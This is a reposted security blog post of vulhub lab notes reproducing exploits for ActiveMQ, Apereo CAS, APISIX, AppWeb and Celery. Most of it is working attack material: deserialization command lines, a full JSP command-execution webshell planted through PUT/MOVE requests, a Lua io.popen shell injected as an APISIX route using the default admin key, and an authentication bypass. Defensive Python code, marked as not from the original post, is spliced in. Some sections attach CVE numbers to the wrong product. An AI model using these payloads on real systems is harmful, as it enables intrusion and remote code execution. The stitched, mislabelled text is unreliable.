A few vulhub vulnerability reproductions (notes)

admin · 2022-03-25 23:52:06 · 369 views · 5938 characters · 19 min 47 s read


Since this is just a record, I won't do much analysis.

I've been tinkering with vulhub recently, so I put together some reproductions along the way.

Fellow practitioners, just take this as a bit of fun.


CVE-2015-5254 (ActiveMQ deserialization vulnerability)

Vulnerability description

Apache ActiveMQ 5.x versions before 5.13.0 contain a security vulnerability: the program does not restrict which classes can be serialized in the broker. A remote attacker can exploit it to execute arbitrary code with a specially crafted serialized Java Message Service (JMS) ObjectMessage object.

Download the PoC (with wget)

wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

Find the port we need to use.

Visit localhost:8161 and log in at localhost:8161/admin/ with admin/admin.

几个vulhub的漏洞复现(记录向)

Run the PoC. You then need to log in to ActiveMQ and click the queue named event to trigger the vulnerability; after that, go into your Docker container and check that the touched file was created under /tmp.

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME localhost 61616

You can also use ysoserial to build a deserialization reverse-shell payload, send it to the ActiveMQ server, and wait for an administrator to click it to get a shell.

How to use ysoserial:

https://ccship.cn/2021/10/21/ysoserial使用方法/

CVE-2016-3088 (ActiveMQ arbitrary file write vulnerability)

Vulnerability description

The vulnerability lies in the fileserver application. The fileserver service in ActiveMQ lets users upload files to a specified directory via the HTTP PUT method. The fileserver supports writing files (without parsing JSP) and also supports moving files (MOVE), so we can PUT a JSP file under the fileserver and then MOVE it into a directory where it is executed, and access it there. Affected versions: Apache ActiveMQ 5.0.0 - 5.13.2.

Use the PUT method to upload a JSP webshell

PUT /fileserver/a.jsp HTTP/1.1
Host: localhost:8161
Destination: file:///opt/activemq/webapps/api/a.jsp
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8161/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1qjva0ng7sf7y1c0chktg5cwzq
Connection: close
Content-Length: 399

<%@ page import="java.io.*" %>
<%
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char)c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>


Then we need to know its absolute path so that the MOVE method can move the file to a location where it is parsed.

—————————

ActiveMQ absolute path leakage

Request Raw:

PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1
Host: localhost:8161
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 4

MOVE /fileserver/a.jsp HTTP/1.1
Host: localhost:8161
Destination: file:///opt/activemq/webapps/api/a.jsp
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8161/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1qjva0ng7sf7y1c0chktg5cwzq
Connection: close
Content-Length: 399

<%@ page import="java.io.*" %>
<%
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char)c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>


Finally, you can find a.jsp in your Docker container under /webapp/api/.
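The PUT / MOVE sequence above leaves a recognisable trace in the broker's HTTP access log. The following Python is an added example (not from the original post and not ActiveMQ code) that scans constructed Combined-Log-Format lines for the traversal probe, a JSP upload to /fileserver/ and a subsequent MOVE from the same source; the log format and status codes are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines modelled on the PUT / MOVE chain described
# above (not captured from a real broker); the status codes are assumed.
SAMPLE_LOG = """\
10.0.0.5 - admin [25/Mar/2022:23:40:01 +0800] "PUT /fileserver/a../../%08/..%08/.%08/%08 HTTP/1.1" 500 0
10.0.0.5 - admin [25/Mar/2022:23:40:07 +0800] "PUT /fileserver/a.jsp HTTP/1.1" 204 0
10.0.0.5 - admin [25/Mar/2022:23:40:12 +0800] "MOVE /fileserver/a.jsp HTTP/1.1" 204 0
10.0.0.9 - - [25/Mar/2022:23:41:00 +0800] "GET /admin/queues.jsp HTTP/1.1" 200 5120
10.0.0.9 - - [25/Mar/2022:23:41:03 +0800] "PUT /fileserver/notes.txt HTTP/1.1" 204 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Label one access-log line, or return None when it is not of interest."""
    m = LINE_RE.match(line)
    if not m:
        return None
    method, path = m.group("method"), unquote(m.group("path"))
    if not path.startswith("/fileserver/"):
        return None
    # The %08 (backspace) path used above to make the servlet leak its base dir.
    if method == "PUT" and ("../" in path or "\x08" in path):
        return "path-leak-probe"
    # Any JSP written into the fileserver webapp is a webshell staging attempt.
    if method == "PUT" and path.lower().endswith((".jsp", ".jspx")):
        return "jsp-upload"
    # MOVE is what relocates the staged file into a directory that parses JSP.
    if method == "MOVE":
        return "fileserver-move"
    return None

def scan(log_text):
    """Group labels per client IP; an IP that both uploaded a JSP and issued a
    MOVE is reported as a likely CVE-2016-3088 exploitation chain."""
    findings = {}
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            findings.setdefault(LINE_RE.match(line).group("ip"), set()).add(label)
    chains = [ip for ip, labels in findings.items()
              if {"jsp-upload", "fileserver-move"} <= labels]
    return findings, chains
```

Any 2xx to a MOVE on /fileserver/ is worth an alert on its own; the chain check just cuts the noise from legitimate uploads.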


apereo-cas-4.1-rce

Vulnerability description

Apereo CAS is an open-source central authentication service released by a Yale University lab in 2002; CAS stands for Central Authentication Service. The vulnerability stems from Webflow using the default key changeit: an attacker can use this default key to trigger a deserialization vulnerability and achieve RCE. Affected versions: 4.1.x-4.1.6.

Tool used:

https://github.com/vulhub/Apereo-CAS-Attack

Create the payload

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"


Use the payload


CVE-2020-13945

Vulnerability description

Apache Unomi is an open-source Java data platform: a Java server designed to manage customer, lead and visitor data and help personalize the customer experience. Unomi can be used to integrate personalization and profile management into very different systems (such as CMS, CRM, issue trackers, native mobile apps and so on). Before Apache Unomi 1.5.1, an attacker could send a malicious request containing a crafted MVEL or OGNL expression and make the Unomi server execute arbitrary code.

POST /apisix/admin/routes HTTP/1.1
Host: localhost:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406

{ "uri": "/attack","script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", "upstream": { "type": "roundrobin", "nodes": { "example.com:80": 1 } }}
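As an added defensive counterpart (not code from the post or from APISIX), the Python below audits a captured Admin API request like the one above: it flags the default admin key and any inline Lua script that reaches the OS. The request body is rebuilt inline with the lost backslash-n escapes restored; the header dict is constructed.

```python
import json
import re

# Default Admin API key from APISIX's example config.yaml, as sent above;
# any deployment that still accepts it exposes the whole routing table.
DEFAULT_ADMIN_KEY = "edd1c9f034335f136f87ad84b625c8f1"

# Lua constructs in an inline route script that execute commands or load code.
DANGEROUS_LUA = re.compile(
    r"\b(?:io\.popen|os\.execute|loadstring|load)\s*\("
    r"|\brequire\s*\(\s*['\"]os['\"]\s*\)"
)

def audit_route(route):
    """Return findings for one route object as posted to /apisix/admin/routes."""
    findings = []
    script = route.get("script")
    if script:
        # Inline scripts run as Lua inside the gateway; they should be rare.
        findings.append("inline script present")
        for m in DANGEROUS_LUA.finditer(script):
            findings.append("script calls " + m.group(0).rstrip("( "))
    return findings

def audit_admin_request(headers, body):
    """Audit a captured Admin API request: credential check plus route content."""
    findings = []
    if headers.get("X-API-KEY") == DEFAULT_ADMIN_KEY:
        findings.append("default admin key in use")
    findings.extend(audit_route(json.loads(body)))
    return findings

# Constructed copy of the request above (headers trimmed to the relevant ones).
POC_HEADERS = {"X-API-KEY": DEFAULT_ADMIN_KEY, "Content-Type": "application/json"}
POC_BODY = json.dumps({
    "uri": "/attack",
    "script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n"
              " local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n"
              " local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
    "upstream": {"type": "roundrobin", "nodes": {"example.com:80": 1}},
})
```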

CVE-2018-8715

AppWeb is an embedded web server developed and maintained by Embedthis Software LLC under the GPL open-source license. It is written in C/C++ and can run on almost all popular operating systems today; its main use, of course, is to provide a web application container for embedded devices.

In versions before 7.0.3, for the digest and form authentication methods, if the password supplied by the user is `null` (that is, no password parameter is passed), AppWeb will, because of a logic error, treat authentication as successful and return a session.


PoC

GET / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin


Get the session ID

1::http.session::b521b677a521ebf5b1d34e6a2217da05

Use the session to log in
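The server-side fix is to refuse credentials that are structurally incomplete before any password logic runs. The following Python is an added example (not AppWeb's code) of such a check for the Digest scheme: it parses an Authorization header and rejects one that, like the PoC above, carries only a username; the required-field list follows RFC 2617, and the complete header shown is constructed.

```python
import re

# Parameters a Digest credential must carry (RFC 2617 section 3.2.2) before
# the server may even try to verify the password-derived "response" value.
REQUIRED_FIELDS = ("username", "realm", "nonce", "uri", "response")

# key="quoted value"  or  key=token
_PARAM_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|([^\s,]+))')

def parse_digest(header):
    """Return the Digest parameters as a dict, or None for any other scheme."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "digest":
        return None
    return {k: (quoted or bare) for k, quoted, bare in _PARAM_RE.findall(params)}

def digest_is_well_formed(header):
    """True only if every required field is present and non-empty and the
    response is a hex digest. The PoC header 'Digest username=admin' has no
    response at all, which is the null-password case the text describes."""
    params = parse_digest(header)
    if params is None:
        return False
    if not all(params.get(field) for field in REQUIRED_FIELDS):
        return False
    # MD5 gives 32 hex chars; SHA-256 (RFC 7616) gives 64.
    return re.fullmatch(r"(?:[0-9a-f]{32}|[0-9a-f]{64})", params["response"].lower()) is not None

# Constructed headers: the PoC's, and a structurally complete one whose nonce
# and response are made-up values, not a real exchange.
POC_HEADER = "Digest username=admin"
COMPLETE_HEADER = ('Digest username="admin", realm="appweb", '
                   'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c0", uri="/", '
                   'response="6629fae49393a05397450978507c4ef1"')
```

A header that passes this check still has to have its response recomputed and compared; the point is that a missing or empty response is rejected instead of being treated as a match.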


CVE-2021-23727

Celery is a simple, flexible and reliable distributed system for processing large volumes of messages, while also providing operators with the tools needed to maintain such a system. It is a task queue focused on real-time processing that also supports task scheduling. Celery < 4.0 uses Pickle by default to serialize task messages, so when the queue service in use (Redis, RabbitMQ, RocketMQ and so on) suffers from an unauthenticated-access problem, the Pickle deserialization vulnerability can be used to execute arbitrary code.

PoC

from celery import Celery

app = Celery('tasks', broker='redis://redis/0', backend='redis://redis/1')
app.conf['CELERY_ACCEPT_CONTENT'] = ['pickle', 'json', 'msgpack', 'yaml']

@app.task
def add(x, y):
    return x + y

python3 exp.py localhost
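The weak setting in the PoC is the accept_content list. As an added example (not Celery's code and not from the post), the Python below audits a Celery configuration mapping for pickle/yaml serializers and an unauthenticated broker URL, and shows the JSON-only configuration beside the weak one; Celery 3.x defaults are assumed where a setting is absent, and the broker password is a placeholder.

```python
# Serializers whose loaders execute code or build arbitrary objects.
UNSAFE_SERIALIZERS = {"pickle", "yaml"}

# Old-style (CELERY_*) and new-style names Celery reads for the same setting.
SETTING_ALIASES = {
    "accept_content": ("CELERY_ACCEPT_CONTENT", "accept_content"),
    "task_serializer": ("CELERY_TASK_SERIALIZER", "task_serializer"),
    "result_serializer": ("CELERY_RESULT_SERIALIZER", "result_serializer"),
    "broker_url": ("BROKER_URL", "broker_url"),
}
# Assumed Celery 3.x defaults (pickle everywhere); 4.0 switched these to json.
DEFAULTS = {
    "accept_content": ["pickle", "json", "msgpack", "yaml"],
    "task_serializer": "pickle", "result_serializer": "pickle", "broker_url": "",
}

def _setting(conf, name):
    """Look the setting up under either name, falling back to the default."""
    for alias in SETTING_ALIASES[name]:
        if alias in conf:
            return conf[alias]
    return DEFAULTS[name]

def audit_celery_conf(conf):
    """Return human-readable findings for a Celery configuration mapping."""
    findings = []
    for bad in sorted(set(_setting(conf, "accept_content")) & UNSAFE_SERIALIZERS):
        findings.append(f"accept_content allows '{bad}'")
    for name in ("task_serializer", "result_serializer"):
        if _setting(conf, name) in UNSAFE_SERIALIZERS:
            findings.append(f"{name} is '{_setting(conf, name)}'")
    broker = str(_setting(conf, "broker_url"))
    # redis://host/0 or amqp://host with no user:pass@ part: anyone who can
    # reach the broker can enqueue a task message.
    if broker.startswith(("redis://", "amqp://")) and "@" not in broker:
        findings.append("broker URL carries no credentials")
    return findings

# The PoC's settings, reproduced as a plain dict.
WEAK_CONF = {
    "BROKER_URL": "redis://redis/0",
    "CELERY_ACCEPT_CONTENT": ["pickle", "json", "msgpack", "yaml"],
}
# Hardened equivalent: JSON only on every serializer setting, authenticated broker.
HARDENED_CONF = {
    "broker_url": "redis://:REPLACE_WITH_PASSWORD@redis/0",  # placeholder secret
    "accept_content": ["json"],
    "task_serializer": "json",
    "result_serializer": "json",
}
```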


A filler article (runs away)

My English is too poor, and I was too lazy to switch input methods.

In a while I want to do a detailed analysis of log4j2.

Learn Java properly first (runs away)

This article was originally published on the WeChat public account 凛夜安全团队: 几个vulhub的漏洞复现(记录向)

Posted by admin on 2022-03-25 23:52:06. Please keep this link when reposting (CN-SEC中文网; thanks to the original author for their hard work): http://cn-sec.com/archives/841799.html
